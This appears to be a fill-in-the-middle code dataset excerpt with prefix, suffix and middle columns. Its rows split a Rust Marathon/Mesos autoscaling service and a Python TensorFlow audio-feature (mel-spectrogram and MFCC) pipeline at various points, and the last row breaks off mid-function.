file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
39k
| suffix
large_stringlengths 0
36.1k
| middle
large_stringlengths 0
29.4k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
service.rs | use std::io::Read;
use std::sync::{Arc, Mutex};
use std::collections::HashMap;
use futures::{self, Future, BoxFuture};
use curl::easy::{Easy, List};
use tokio_core::reactor::Handle;
use tokio_curl::{Session, PerformError};
use serde_json::{from_value, from_str, Value};
pub type Fut<T> = BoxFuture<T, PerformError>;
#[derive(Debug)]
pub struct App {
pub name: String,
pub max_mem_usage: f64,
pub max_cpu_usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct | {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => {
max_instances = from_value(v.clone()).unwrap();
}
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response.into_owned()
}).boxed()
}
}
#[cfg(test)]
mod tests {
use tokio_core::reactor::Core;
#[test]
#[ignore]
fn test() {
let marathon_url = "http://localhost:8080";
let mesos_url = "http://localhost:5050";
let mut evloop = Core::new().unwrap();
let mut service = ::Service::new(evloop.handle(),
marathon_url.to_string(),
mesos_url.to_string(),
80.0, 80.0, 1.5, 10);
let fut = service.get_slaves();
let slaves = evloop.run(fut).unwrap();
let fut = service.get_apps();
let apps = evloop.run(fut).unwrap();
for id in apps {
let fut = service.get_app(&id);
let app = evloop.run(fut).unwrap().unwrap();
let fut = service.get_statistic(&app, &slaves, None);
let stat = evloop.run(fut).unwrap();
if app.name == "api" {
let fut = service.scale(&app);
evloop.run(fut).unwrap();
}
}
}
}
| Service | identifier_name |
service.rs | use std::io::Read;
use std::sync::{Arc, Mutex};
use std::collections::HashMap;
use futures::{self, Future, BoxFuture};
use curl::easy::{Easy, List};
use tokio_core::reactor::Handle;
use tokio_curl::{Session, PerformError};
use serde_json::{from_value, from_str, Value};
pub type Fut<T> = BoxFuture<T, PerformError>;
#[derive(Debug)]
pub struct App {
pub name: String,
pub max_mem_usage: f64,
pub max_cpu_usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct Service {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => |
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response.into_owned()
}).boxed()
}
}
#[cfg(test)]
mod tests {
use tokio_core::reactor::Core;
#[test]
#[ignore]
fn test() {
let marathon_url = "http://localhost:8080";
let mesos_url = "http://localhost:5050";
let mut evloop = Core::new().unwrap();
let mut service = ::Service::new(evloop.handle(),
marathon_url.to_string(),
mesos_url.to_string(),
80.0, 80.0, 1.5, 10);
let fut = service.get_slaves();
let slaves = evloop.run(fut).unwrap();
let fut = service.get_apps();
let apps = evloop.run(fut).unwrap();
for id in apps {
let fut = service.get_app(&id);
let app = evloop.run(fut).unwrap().unwrap();
let fut = service.get_statistic(&app, &slaves, None);
let stat = evloop.run(fut).unwrap();
if app.name == "api" {
let fut = service.scale(&app);
evloop.run(fut).unwrap();
}
}
}
}
| {
max_instances = from_value(v.clone()).unwrap();
} | conditional_block |
audio_processing.py | import os
import tensorflow as tf
def get_label(file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot( | tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mel_spectrogram_ds = mel_spectrogram_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mel_spectrogram_ds, file_paths, labels_to_integers)
return mel_spectrogram_ds
def prepare_mfcc_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
num_mel_bins_to_pick=12,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
mel_spectrogram_ds = prepare_mel_spectrogram_dataset(
file_paths, sample_rate, clip_duration, fft_frame_length, fft_frame_step,
num_mel_bins, lower_edge_hertz, upper_edge_hertz, True, add_energy, False, [],
False
)
mfcc_ds = mel_spectrogram_ds.map(
lambda mel: get_mfcc(
mel, num_mel_bins_to_pick, add_energy, add_first_delta,
add_second_delta, symmetric_zero_padding
),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
mfcc_ds = mfcc_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(mfcc_ds, file_paths, labels_to_integers)
return mfcc_ds | random_line_split |
|
audio_processing.py | import os
import tensorflow as tf
def get_label(file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
|
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
